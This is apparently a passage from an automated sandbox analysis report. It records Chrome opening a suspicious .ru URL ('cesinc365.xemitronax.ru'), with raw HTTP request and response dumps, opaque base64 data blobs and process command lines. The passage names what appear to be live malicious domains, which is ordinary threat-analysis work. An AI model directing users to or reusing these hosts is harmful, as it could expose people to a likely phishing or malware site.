                                                          Data Ascii: mKqpZdma6abboGDqnGqq5ivmaWbjrOSuHzCvrejf8OympWZuq+/xcWfz6bHqMKTytGtycy/yp7Mw+LZ1trmpdmm08jd49rs2+nR3d3p8uvt1+6u6vUA0uy9vPj8vwTj/cMDDvcG6eT5CRMVAdETEgnUCxMS2BMJEhgC/QX14xMVIugWIegoBCQUK+0fLyAZKjEv9yn6O/4sIhYdQDo3+jJBOy5FCUM+MzRTU1BLORVPO1M+Pxo9XUoeIE9bN1wx
                                                          2025-01-09 20:12:29 UTC1369INData Raw: 61 70 70 70 79 54 67 37 65 71 67 4c 4b 59 6d 48 69 72 74 4b 43 70 73 62 69 59 76 37 4f 41 67 34 69 32 68 59 65 39 75 73 6d 38 72 72 4c 52 71 5a 2f 45 76 37 57 30 6b 4d 2f 59 78 4b 2b 36 7a 5a 36 37 72 37 65 67 76 61 4f 66 73 37 54 58 32 4f 57 71 32 73 72 6d 73 4e 36 2b 38 2b 4b 74 37 4f 66 57 73 4c 62 35 2f 75 37 75 73 76 6e 71 37 67 44 76 35 4d 50 36 41 74 6a 63 2f 50 55 45 79 2f 37 79 34 67 44 79 42 75 51 50 43 51 6f 4f 32 38 37 2b 2f 42 7a 73 45 4e 6f 63 48 42 54 68 41 76 67 69 49 4f 50 69 48 2b 66 35 4b 69 6f 52 37 43 73 65 46 66 51 4e 49 76 55 4f 44 68 30 4e 51 42 55 31 4e 6b 51 6a 4a 69 51 42 51 6b 4d 47 42 52 78 48 51 6b 78 48 4d 54 49 55 45 6c 41 32 54 30 4a 43 55 52 78 4e 54 54 38 31 56 46 4d 31 56 46 64 53 58 54 6f 33 55 6b 6f 6b 62 45 34 73 59
                                                          Data Ascii: apppyTg7eqgLKYmHirtKCpsbiYv7OAg4i2hYe9usm8rrLRqZ/Ev7W0kM/YxK+6zZ67r7egvaOfs7TX2OWq2srmsN6+8+Kt7OfWsLb5/u7usvnq7gDv5MP6Atjc/PUEy/7y4gDyBuQPCQoO287+/BzsENocHBThAvgiIOPiH+f5KioR7CseFfQNIvUODh0NQBU1NkQjJiQBQkMGBRxHQkxHMTIUElA2T0JCURxNTT81VFM1VFdSXTo3UkokbE4sY
                                                          2025-01-09 20:12:29 UTC557INData Raw: 6d 73 4c 47 77 68 4c 32 73 6b 4c 4f 36 73 4c 64 2f 64 72 53 75 77 72 53 33 71 4a 32 64 72 4b 7a 44 6e 38 47 50 7a 38 75 7a 79 71 44 55 79 62 65 54 6a 73 2b 73 31 70 76 42 73 75 4f 2f 31 73 37 65 34 4f 4c 67 78 4e 58 56 71 61 79 34 33 65 6a 62 78 39 2b 7a 73 2f 6e 6f 38 64 44 6b 33 4e 37 32 38 4f 44 33 76 2f 62 32 76 2f 63 46 36 64 72 33 42 66 6b 43 43 38 73 44 34 76 44 50 39 76 51 4d 46 52 54 34 37 42 7a 37 32 4e 38 56 45 67 4d 50 45 52 33 66 38 43 6f 69 35 79 44 35 4a 69 51 66 47 53 50 72 4b 79 6f 6f 46 50 51 31 4b 51 30 34 47 43 77 66 43 68 67 77 4e 67 45 36 4a 52 6f 53 53 43 67 49 50 7a 68 49 49 51 67 36 4d 43 56 51 55 30 34 2f 45 45 4a 53 55 31 4e 46 56 68 77 53 58 6c 6f 31 49 56 35 65 52 43 68 55 59 32 4e 63 5a 47 59 38 5a 31 6c 52 57 32 74 65 56 44
                                                          Data Ascii: msLGwhL2skLO6sLd/drSuwrS3qJ2drKzDn8GPz8uzyqDUybeTjs+s1pvBsuO/1s7e4OLgxNXVqay43ejbx9+zs/no8dDk3N728OD3v/b2v/cF6dr3BfkCC8sD4vDP9vQMFRT47Bz72N8VEgMPER3f8Coi5yD5JiQfGSPrKyooFPQ1KQ04GCwfChgwNgE6JRoSSCgIPzhIIQg6MCVQU04/EEJSU1NFVhwSXlo1IV5eRChUY2NcZGY8Z1lRW2teVD


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.449772104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:30 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:30 UTC375INHTTP/1.1 404 Not Found
                                                          Date: Thu, 09 Jan 2025 20:12:30 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 7
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: 3lCJbGCn7yv+PJLTEqAITQ==$jQDH+06SOxiENo7/hiZVDQ==
                                                          Server: cloudflare
                                                          CF-RAY: 8ff715209a78c35f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                          Data Ascii: invalid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.449774172.67.195.2294436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:30 UTC675OUTGET /929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYI HTTP/1.1
                                                          Host: jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://cesinc365.xemitronax.ru
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://cesinc365.xemitronax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:31 UTC916INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLS%2BAmh90mAsR1XPoJnEvc%2FSuSEy14tViHRSseBPDRXP1XRcDfB3acqAV%2BFA%2B7zylolfVbU8TjS%2BTJ%2Bxq944lKsUgKnFTzg1f%2Fn5hOmY%2FKc9jCsbbGAT8bRUmFsx0PswmjnWTzK%2B65sWAEPHvDLT1U6zNYp6rzdN4SOWWV3h017r9YrUXSKakrV%2F5FZ1eknwX5b1q6QWB0zyJFmRJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ff71524eae718f2-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1607&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1253&delivery_rate=1707602&cwnd=232&unsent_bytes=0&cid=06c16617e76c2cb5&ts=605&x=0"
                                                          2025-01-09 20:12:31 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                          Data Ascii: 11
                                                          2025-01-09 20:12:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.449777172.67.195.2294436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:32 UTC455OUTGET /929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYI HTTP/1.1
                                                          Host: jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:32 UTC902INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6PW5JYh7mUitOoURLKD81ST3lRTOdSJjfFgvnRpN%2BGw4IC1XlNopBmhPDrOwTxu%2BGrCXvHWbpZqhlSL44Elwp5bNsjSyVpAT2XvfqYJlqV83%2BtSZC9DZY7mcM29bKpEJrM2oVZEdwS9TCTQQ4SFHp0XrZw7nGrRuqVGPc8MuoFC9EFhuf78Y0Hy4gZr8fdWzUNj9lvov4ISpYSafw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ff7152ce9a27292-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1818&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1033&delivery_rate=1604395&cwnd=252&unsent_bytes=0&cid=3dbfaba3b97fbc7d&ts=587&x=0"
                                                          2025-01-09 20:12:32 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                          Data Ascii: 11
                                                          2025-01-09 20:12:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:15:12:02
                                                          Start date:09/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:15:12:05
                                                          Start date:09/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2304,i,16959890076027813342,710148455855415502,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:15:12:12
                                                          Start date:09/01/2025
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cesinc365.xemitronax.ru/9FAvn/"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          No disassembly